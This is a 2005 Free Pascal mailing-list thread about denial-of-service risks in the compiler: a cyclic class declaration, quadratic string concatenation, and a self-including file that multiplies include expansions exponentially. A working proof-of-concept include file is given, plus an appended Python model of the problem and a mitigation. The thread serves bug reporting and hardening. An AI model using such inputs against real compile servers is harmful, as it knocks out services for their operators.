On Tue, 06 Dec 2005 11:08:26 +0100 Vincent Snijders <[EMAIL PROTECTED]> wrote:
> Mattias Gaertner wrote:
> > On Mon, 5 Dec 2005 18:50:28 +0100 (CET)
> > Michael Van Canneyt <[EMAIL PROTECTED]> wrote:
> >
> >> On Mon, 5 Dec 2005, L505 wrote:
> >>
> >>> Also, a simple macro could end up in a neverending loop and bring down
> >>> the server. Lots of other ways to make a compiler go nuts.
> >>
> >> The Free Pascal compiler checks for recursive expansion. If it goes over
> >> 16, it stops.
> >>
> >> In case you prove otherwise, of course, we have a bug...
> >
> > Here is my first fpc DOS attack:
> >
> > type
> >   TMyClassA = class;
> >
> >   TMyClassA = class(TMyClassA)
> >     procedure DoSomething; override;
> >   end;
>
> Reported as 4569:
> http://www.freepascal.org/bugs/showrec.php3?ID=4569

Thanks.

There are more such denial of service attack possibilities. But they don't
happen in serious Pascal code, so I don't think they should pollute the bug
list. The above is different, as the real bug is that fpc allows cycles and
can happen by a single typo.

Other potential denial of service attacks:

Concatenation of string constants needs O(n^2).

s=' ... string ...'
 +' ... string ...'
 ... one thousand concatenations ...
 ;

Include directives

FPC allows a maximum depth of 16 levels. That means a single include file
can create valid n^15 include directives.

// fpc has a built-in maximum of include files depth 16
// this can be used for a denial of service attack:
{$IFNDEF DOSStarted}
  {$DEFINE DOSStarted}
  {$DEFINE Level1}
  {$I denialofservice.inc}
{$ELSE}
  {$IFDEF Level3}{$UNDEF Level3}{$DEFINE Level4}{$NOTE Level 4}{$ENDIF}
  {$IFDEF Level2}{$UNDEF Level2}{$DEFINE Level3}{$NOTE Level 3}{$ENDIF}
  {$IFDEF Level1}{$UNDEF Level1}{$DEFINE Level2}{$NOTE Level 2}{$ENDIF}
  {$IFNDEF Level4} // increase this till 15
    // include n-times
    {$I denialofservice.inc}
    {$I denialofservice.inc}
  {$ENDIF}
  {$IFDEF Level1}{$UNDEF Level1}{$NOTE Level 0}{$ENDIF}
  {$IFDEF Level2}{$UNDEF Level2}{$DEFINE Level1}{$NOTE Level1}{$ENDIF}
  {$IFDEF Level3}{$UNDEF Level3}{$DEFINE Level2}{$NOTE Level2}{$ENDIF}
  {$IFDEF Level4}{$UNDEF Level4}{$DEFINE Level3}{$NOTE Level3}{$ENDIF}
{$ENDIF}

> Maybe the test program can be added to the testsuite.

;-)

Mattias
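
Added example (not part of the original message and not FPC's own code): a simplified Python model of include expansion, showing why the depth cap of 16 mentioned in the message does not bound the work and how a cap on total expansions does. The file names, the expand and chain helpers and the budget parameter are assumptions made for illustration; only the {$I file} directive form comes from the message.

```python
import re

INCLUDE = re.compile(r"\{\$I\s+([^}\s]+)\s*\}")  # matches {$I file.inc}


class IncludeLimit(Exception):
    """Raised when the depth cap or the total-expansion budget is exceeded."""


def expand(files, name, max_depth=16, budget=None):
    """Return how many files get opened when expanding `name`.

    files:     dict of file name -> source text (constructed, in memory)
    max_depth: nesting cap, as in the message
    budget:    hypothetical cap on total expansions (None = no cap)
    """
    opened = 0
    stack = [(name, 1)]  # iterative walk: Python's recursion limit is not the bound
    while stack:
        current, depth = stack.pop()
        if depth > max_depth:
            raise IncludeLimit(f"depth {depth} exceeds {max_depth}")
        opened += 1
        if budget is not None and opened > budget:
            raise IncludeLimit(f"more than {budget} include expansions")
        for child in INCLUDE.findall(files[current]):
            stack.append((child, depth + 1))
    return opened


def chain(levels, fanout):
    """Constructed input: level k includes level k+1 `fanout` times."""
    files = {}
    for k in range(1, levels + 1):
        line = "{$I level%d.inc}\n" % (k + 1)
        files["level%d.inc" % k] = "" if k == levels else line * fanout
    return files


if __name__ == "__main__":
    # Depth 16 with fan-out 2 stays inside the depth cap, yet the deepest
    # level alone is opened 2**15 times (the n^15 from the message).
    print("depth cap only:", expand(chain(16, 2), "level1.inc"))
    try:
        expand(chain(16, 3), "level1.inc", budget=10_000)
    except IncludeLimit as exc:
        print("budget stops it:", exc)
```
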